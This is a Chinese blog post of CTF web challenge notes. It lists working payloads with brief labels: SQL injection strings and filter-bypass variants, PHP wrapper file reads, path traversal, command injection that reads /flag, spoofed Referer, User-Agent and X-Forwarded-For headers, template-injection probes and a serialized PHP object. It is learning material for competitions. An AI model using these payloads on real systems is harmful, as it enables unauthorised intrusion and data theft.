Web杂记-优快云博客

本文链接：https://blog.youkuaiyun.com/Tinyyy1/article/details/134548027

文章讲述了在2019年极客大挑战中的网络安全题目，涉及SQL注入、HTTP头信息伪造（Referer,User-Agent,X-Forwarded-For）、文件读取（如calc.php和file_get_contents）、模板注入以及序列化等技术的利用方法。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

?file=php://filter/read=convert.base64-encode/resource=flag.php

（伪协议）

?file=hint.php%253f../../../../../../../../ffffllllaaaagggg

1';PREPARE hacker from concat('s','elect', ' * from `1919810931114514` ');EXECUTE hacker;#

（堆叠注入）

select *,1 from flag

?ip=127.0.0.1;a=g;cat$IFS$1index.php

127.0.0.1 & cat /flag

/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

1' or 1=1 #（万能密码）

1' union select 1 #（联合查询）

1 ' ununionion seselectlect 1,2,3 #（双写）

1 %27 ununionion seselectlect 1, database(),3%23 （查库名）

1' ununionion seselectlect 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'#（查库信息）

1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='ctf'#

1' ununionion seselectlect 1,2,group_concat(Flag) frfromom ctf.Flag#

比如上面提示不是来自https://www.Sycsecret.com，就可以在header中添加上 Referer:https://www.Sycsecret.com ，来伪造访问来源，Referer协议就是告诉服务器我从哪里来。所以抓包修改

添加后访问，提示请使用 Syclover 浏览器，这就可以想到用User-Agent协议来伪造访问工具为 Syclover 浏览器，这个协议就是告诉服务器我是用什么访问的 .修改 User-Agent 为User-Agent: Syclover

只能在本地，我们可以伪造本地ip 127.0.0.1,所以我们可以利用X-Forwarded-For协议来伪造只需要在 header 添加 X-Forwarded-For:127.0.0.1，再次访问，这时得到flag

calc.php? num=print_r(scandir('/')); （读取根目录）

? num=print_r(file_get_contents('/flagg'));

其中/flagg 用chr进行绕过

num=print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)));

?msg={{1*2}}（模板注入）

?msg={{handler.settings}}

?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

$a=newFlag();

echoserialize($a);

（序列化）